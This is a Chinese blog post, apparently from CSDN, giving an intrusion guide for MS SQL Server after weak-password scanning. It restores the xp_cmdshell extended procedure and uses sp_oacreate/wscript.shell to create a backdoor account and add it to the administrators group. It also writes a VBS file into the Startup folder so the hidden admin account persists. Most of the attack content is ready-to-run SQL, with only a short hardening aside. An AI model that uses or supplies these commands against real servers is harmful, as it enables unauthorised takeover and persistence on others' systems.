恢复xp_cmdshell

最新推荐文章于 2021-03-17 07:17:34 发布
最新推荐文章于 2021-03-17 07:17:34 发布
阅读量1.6k 收藏
点赞数
分类专栏: MSSQL类 文章标签: xp shell null output dll transactions
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/cdefu/article/details/3988020
版权

 

用这些命令恢复一下xp_cmdshell

开启cmdshellSQL语句

EXEC sp_addextendedproc xp_cmdshell ,@dllname ='xplog70.dll'

判断存储扩展是否存在
Select count(*) from master.dbo.sysobjects where xtype='X' and name='xp_cmdshell'
返回结果为1OK

恢复xp_cmdshell
Exec master.dbo.addextendedproc 'xp_cmdshell','xplog70.dll';select count(*) from master.dbo.sysobjects where xtype='X' and name='xp_cmdshell'
返回结果为1OK

否则上传xplog7.0.dll
Exec master.dbo.addextendedproc 'xp_cmdshell','C:/WinNt/System32/xplog70.dll'

扫到SQL弱口令后利用SQLTOOLS出现未能找到存储过程 'master..xp_cmdshell'
这种情况的主要原因是删除了扩展存储过过程xp_cmdshell,有一个恢复的办法,如果不成功说明被改名了

使用SQLTOOLS连接,连接后在利用目录下点执行数据库命令,执行:
EXEC sp_addextendedproc xp_cmdshell ,@dllname ='xplog70.dll'
运气好的话就成功了,如果你想让你的肉鸡用SQL执行不了DOS命令的话,执行:
sp_dropextendedproc "xp_cmdshell"
就执行不了DOS命令了,当然用上面的语句可以复原。

SQLTOOLS可以连接成功,执行DOS命令,却总是显示这个、、、拒绝了对对象 'xp_cmdshell'(数据库 'master',所有者 'dbo')的 EXECUTE 权限。
怎么解决????
上传文件也不行。。。
1 未能找到存储过程'master..xpcmdshell'

恢复方法:查询分离器连接后,

第一步执行:EXEC sp_addextendedproc xp_cmdshell,@dllname ='xplog70.dll'declare @o int
第二步执行:sp_addextendedproc 'xp_cmdshell', 'xpsql70.dll'
然后按F5键命令执行完毕。

2 无法装载 DLL xpsql70.dll 或该DLL所引用的某一DLL。原因126(找不到指定模块。)

恢复方法:查询分离器连接后,

第一步执行:EXEC sp_addextendedproc xp_cmdshell,@dllname ='xplog70.dll'declare @o int
第二步执行:sp_addextendedproc 'xp_cmdshell', 'xpsql70.dll'
然后按F5键命令执行完毕。

3 无法在库 xpweb70.dll 中找到函数 xp_cmdshell。原因: 127(找不到指定的程序。)

恢复方法:查询分离器连接后,
第一步执行:exec sp_dropextendedproc 'xp_cmdshell'
第二步执行:exec sp_addextendedproc 'xp_cmdshell','xpweb70.dll'
然后按F5键命令执行完毕。

.终极方法:

如果以上方法均不可恢复,请尝试用下面的办法直接添加帐户:

查询分离器连接后,

2000servser系统:

declare @shell int exec sp_oacreate 'wscript.shell',@shell output
exec sp_oamethod @shell,'run',null,'c:/winnt/system32/cmd.exe /c net user 新用户 密码 /add'

declare @shell int exec sp_oacreate 'wscript.shell',@shell output exec sp_oamethod
@shell,'run',null,'c:/winnt/system32/cmd.exe /c net localgroup administrators 新用户 /add'

xp2003server系统:

declare @shell int exec sp_oacreate 'wscript.shell',@shell output exec sp_oamethod
@shell,'run',null,'c:/windows/system32/cmd.exe /c net user 新用户 密码 /add'
declare @shell int exec sp_oacreate 'wscript.shell',@shell output exec sp_oamethod
@shell,'run',null,'c:/windows/system32/cmd.exe /c net localgroup administrators 新用户 /add'

还不行就没办法了

方法1:查询分离器连接后执行:
if exists (select * from
dbo.sysobjects where id = object_id(N'[dbo].[xp_cmdshell]') and
OBJECTPROPERTY(id, N'IsExtendedProc') = 1)

exec sp_dropextendedproc N'[dbo].[xp_cmdshell]'

GO

然后按F5键命令执行完毕

方法2:查询分离器连接后
第一步执行:use master
第二步执行:sp_dropextendedproc 'xp_cmdshell' 然后按F5键命令执行完毕


1 未能找到存储过程'master..xpcmdshell'. 恢复方法:查询分离器连接后,
第一步执行:EXEC sp_addextendedproc xp_cmdshell,@dllname ='xplog70.dll'declare @o int
第二步执行:sp_addextendedproc 'xp_cmdshell', 'xpsql70.dll' 然后按F5键命令执行完毕

2 无法装载 DLL xpsql70.dll 或该DLL所引用的某一 DLL。原因126(找不到指定模块。)
恢复方法:查询分离器连接后,
第一步执行:sp_dropextendedproc "xp_cmdshell"
第二步执行:sp_addextendedproc 'xp_cmdshell', 'xpsql70.dll'然后按F5键命令执行完毕

3 无法在库 xpweb70.dll 中找到函数 xp_cmdshell。原因: 127(找不到指定的程序。)
恢复方法:查询分离器连接后,
第一步执行:exec sp_dropextendedproc 'xp_cmdshell'
第二步执行:exec sp_addextendedproc 'xp_cmdshell','xpweb70.dll'
然后按F5键命令执行完毕

.终极方法.如果以上方法均不可恢复,请尝试用下面的办法直接添加帐户:
1,查询分离器连接后,
2000servser系统:
declare @shell int exec sp_oacreate 'wscript.shell',@shell output exec sp_oamethod @shell,'run',null,'c:/winnt/system32/cmd.exe /c net user yszar andylau /add'

declare @shell int exec sp_oacreate 'wscript.shell',@shell output exec sp_oamethod @shell,'run',null,'c:/winnt/system32/cmd.exe /c net localgroup administrators yszar /add'

xp2003server系统:

declare @shell int exec sp_oacreate 'wscript.shell',@shell output exec sp_oamethod @shell,'run',null,'c:/windows/system32/cmd.exe /c net user 用户名 密码 /add'

declare @shell int exec sp_oacreate 'wscript.shell',@shell output exec sp_oamethod @shell,'run',null,'c:/windows/system32/cmd.exe /c net localgroup administrators 用户名 /add'

或者可以

declare @o int
exec sp_oacreate 'wscript.shell', @o out
exec sp_oamethod @o, 'run', NULL, 'XXXXX' //XXXXX为你要执行的命令


有时候用查询分离器连接执行以上语句的时候会出现找不到存储过程 sp_addextendedproc

解决方法:

create procedure sp_addextendedproc --- 1996/08/30 20:13
@functname nvarchar(517),/* (owner.)name of function to call */
@dllname varchar(255)/* name of DLL containing function */
as
set implicit_transactions off
if @@trancount > 0
begin
raiserror(15002,-1,-1,'sp_addextendedproc')
return (1)
end
dbcc addextendedproc( @functname, @dllname)
return (0) -- sp_addextendedproc
GO
这段代码贴入查询分离器,执行


1.突破xplog70.dll

declare @cmd INT
exec sp_oacreate 'wscript.shell',@cmd output
exec sp_oamethod @cmd,'run',null,'net user 用户名 密码 /add','0','true'
declare @cmd INT
exec sp_oacreate 'wscript.shell',@cmd output
exec sp_oamethod @cmd,'run',null,'net localgroup administrators 用户名 /add','0','true'

2.恢复xp_cmdshell
先尝试恢复xp_cmdshellsp_addextendedproc 'xp_cmdshell', 'xpsql70.dll'
结果发现xpsql70.dll被删除。

然后写vbs文件到启动组里面:
declare @o int, @f int, @t int, @ret int ,@a int
exec sp_oacreate 'scripting.filesystemobject', @o out
exec sp_oamethod @o, 'createtextfile', @f out,
'c://docume~1//alluse~1//「开始」菜单//程序//启动//a.vbs', 1
exec @ret = sp_oamethod @f, 'writeline', NULL,
'set wshshell=createobject("wscript.shell")'
exec @ret = sp_oamethod @f, 'writeline', NULL,
'a=wshshell.run ("cmd.exe /c net user lintao lintao520 /add",0)'
exec @ret = sp_oamethod @f, 'writeline', NULL,
'b=wshshell.run ("cmd.exe /c net localgroup administrators lintao /add",0)'

3.去除SAxp_cmdshell权限
如果你不需要扩展存储过程xp_cmdshell请把它去掉。使用这个SQL语句:
use master
sp_dropextendedproc 'xp_cmdshell'
xp_cmdshell是进入操作系统的最佳捷径,是数据库留给操作系统的一个大后门。如果你需要这个存储过程,请用这个语句也可以恢复过来。
sp_addextendedproc 'xp_cmdshell', 'xpsql70.dll'

4.上传xplog7.0.dll

exec master.dbo.addextendedproc 'xp_cmdshell','c:/winnt/system32/xplog70.dll'

 

快乐无边
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
xp——cmdshell恢复(古老语言)(内有转载)
Coisini的博客
05-25 435
1 未能找到存储过程’master…xpcmdshell’. EXEC master.dbo.sp_addextendedproc 后用下面的三种方法,在注入点上执行加个空格和;号 恢复方法:查询分离器连接后, 第一步执行:EXEC sp_addextendedproc xp_cmdshell,@dllname ='xplog70.dll’declare @o int 第二步执行:sp_adde...
1433 SA弱口令入侵 XPCMDSHELL 恢复全攻略
01-31
把目前已知能够恢复1433 xpcmdshell master 全部SQL语句经过详细的整理后写成,虽然你下载的只是一个小小的TXT文件,但是里面包含着你现在非常需要,而且下载后会想永久保存的txt.资源分设高点为了防止过分滥传播!敬请谅解!小菜编译,老鸟请让步,谢谢!
SQL入侵恢复xp_cmdshell方法总结
09-11
恢复xp_cmdshell SQL Server阻止了对组件 'xp_cmdshell' 的过程'sys.xp_cmdshell' 启用
mssql 2008恢复xp_cmdshell
cnbird's blog
12-26 1100
mssql 2008恢复xp_cmdshell
常见情况恢复执行xp_cmdshell.
rjgcwl的专栏
01-14 1126
常见情况恢复执行xp_cmdshell.2007年08月28日 星期二 17:37 常见情况恢复执行xp_cmdshell.1 未能找到存储过程master..xpcmdshell.    恢复方法:查询分离器连接后,第一步执行:EXEC sp_addextendedproc xp_cmdshell,
恢复xp_cmdshell的N个方法
weixin_34018169的博客
11-15 185
方法1:查询分离器连接后第一步执行:use master 第二步执行:sp_dropextendedproc 'xp_cmdshell' 然后按F5键命令执行完毕 三.常见情况恢复执行xp_cmdshell. 1 未能找到存储过程'master..xpcmdshell'.恢复方法:查询分离器连接后,第一步执行:EXEC sp_addextendedproc xp_cmds...
xp_cmdshell开启与关闭
09-11
这将恢复xp_cmdshell扩展存储过程,允许管理员继续使用xp_cmdshell。 需要注意的是,xp_cmdshell的使用需要非常小心,因为它可以执行任何操作系统命令,从而可能导致服务器安全漏洞。如果您决定使用xp_cmdshell,请...
sql2005开启xp_cmdshell
09-11
3. **(可选)恢复`xp_cmdshell`**: 在某些情况下,如果你之前已经禁用了`xp_cmdshell`并且需要重新添加,你可以使用以下语句: ```sql dbcc addextendedproc("xp_cmdshell","xplog70.dll"); ``` 或者使用`sp...
删除与恢复xp_cmdshell
無為
05-30 1559
删除xp_cmdshellUse Master Exec sp_dropextendedproc Nxp_cmdshell Go 恢复xp_cmdshellUse Master Exec sp_addextendedproc N xp_cmdshell, Nxplog70.dll Go
mysql xpcmdshell,SQL入侵恢复xp_cmdshell方法总结
weixin_36341727的博客
03-17 263
sql server 2005下开启xp_cmdshell的办法EXEC sp_configure 'show advanced options', 1;RECONFIGURE;EXEC sp_configure 'xp_cmdshell', 1;RECONFIGURE;SQL2005开启'OPENROWSET'支持的方法:exec sp_configure 'show advanced opti...
mysql恢复cmdshell_MySQL误操作恢复
weixin_35278163的博客
01-19 138
#!/bin/env python#-*- coding:utf-8 -*-importos,sys,re,getoptimportMySQLdbhost= '127.0.0.1'user= ''password= ''port= 3306start_datetime= '1971-01-01 00:00:00'stop_datetime= '2037-01-01 00:00:00'start_p...
SQL Server 2005 2008 xp_cmdshell 恢复与禁用
eldn__的专栏
12-03 3273
SQL Server 2005 2208 xp_cmdshell存储过程  默认禁用了,用下面的语句可以打开和禁用。 --SQL语句开xp_cmdshell -- To allow advanced options to be changed. EXEC sp_configure 'show advanced options', 1 GO -- To update the cur
删除和恢复xp_cmdshell的经典教程
kuxing100的专栏
02-18 700
常见情况恢复执行xp_cmdshell. 1 未能找到存储过程'master..xpcmdshell'.      恢复方法:查询分离器连接后, 第一步执行:EXEC sp_addextendedproc xp_cmdshell,@dllname ='xplog70.dll'declare @o int  第二步执行:sp_addextendedproc 'xp_cmdshell',
sql储存过程操作语句
12-29 1116
扩展储存过程被删除以后可以有很简单的办法恢复:删除drop procedure sp_addextendedprocdrop procedure sp_oacreateexec sp_dropextendedproc xp_cmdshell恢复dbcc addextendedproc ("sp_oacreate","odsole70.dll")dbcc addextendedproc ("xp
突破SQL的xp_cmdshell恢复终极方法
woshidaniu的专栏
06-17 1424
突破SQL的xp_cmdshell恢复终极方法sql server 2005下开启xp_cmdshell的办法以下是引用片段:EXEC sp_configure ’show advanced options’, 1;RECONFIGURE;EXEC sp_configure ’xp_cmdshell’, 1;RECONFIGURE;SQL2005
sqlserver2005中恢复xp_cmdshell的方法
大海的专栏
03-29 966
SQL Server 已封锁元件 xp_cmdshell 的 程序 sys.xp_cmdshell 之存取,因为此元件已经由此服器的安全性组态关闭。系统管理员可以使用 sp_configure 来启用 xp_cmdshell 的使用。如需有关启用 xp_cmdshell 的详细资讯,请参阅《SQL Server 线上丛书》中的<介面区组态>(Surface Area Configu
mysql xpcmd_SQL入侵恢复XP_CMDSHLL与开3389
weixin_29956903的博客
01-19 214
一,用SQL连接器恢复XP_CMDSHLLE的命令(1)sp_addextendedproc xp_cmdshell,@dllname='xplog70.dll'(2)首先在SqlExec Sunx Version的Format选项里填上%s,在CMD选项里输入sp_addextendedproc 'xp_cmdshell','xpsql70.dll'去除sp_dropextendedproc '...
彻底删除SQL Server2000的xp_cmdShell扩展存贮过程
11-11 205
一、xp_cmdshell的删除及恢复 1、判断xp_cmdshell是否存在 (SELECT count(*) FROM master.dbo.sysobjects WHERE xtype = 'X' AND name ='xp_cmdshell') 返回结果为1就ok 2、恢复xp_cmdshell的方法 删除扩展存储过过程xp_cmdshell的语句 exec sp_dropext...
sql server xp_cmdshell注入
最新发布
10-19
SQL Server的xp_cmdshell是一种在数据库中执行操作系统级命令的功能。然而,xp_cmdshell也被黑客滥用,用于进行SQL Server注入攻击。 xp_cmdshell注入是一种利用SQL Server的xp_cmdshell的漏洞,通过构造恶意SQL语句来执行任意操作系统命令。攻击者可以将自己的恶意脚本嵌入到SQL查询中,并在成功执行攻击后,实现对操作系统的非授权访问。 为了防止xp_cmdshell注入,我们可以采取以下措施: 1. 最佳实践规范:在部署SQL Server时,应遵循最佳实践并限制对xp_cmdshell的使用。只有授权用户才能使用xp_cmdshell,并最小化对其的权限。 2. 存储过程控制:编写存储过程是一种减少xp_cmdshell注入风险的好方法。通过使用存储过程,可以在执行xp_cmdshell之前进行输入验证和参数验证,以防止恶意代码执行。 3. 输入验证:在开发和设计应用程序时,应该对用户提供的输入进行验证和过滤,以防止恶意代码或SQL注入的注入攻击。 4. 更新和补丁:及时安装SQL Server的更新和补丁是防止xp_cmdshell注入的关键。这些更新和补丁将修复已知的漏洞,并加强系统的安全性。 5. 审计和监控:配置SQL Server以记录和监视xp_cmdshell的使用是防止注入的另一种方法。通过实时监控xp_cmdshell的使用情况,可以及时发现和阻止潜在的注入攻击。 总之,防止xp_cmdshell注入是很重要的,我们需要采取适当措施保护SQL Server,如限制访问权限、验证输入、及时更新等。这样可以提高系统的安全性,并减少被黑客攻击的风险。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值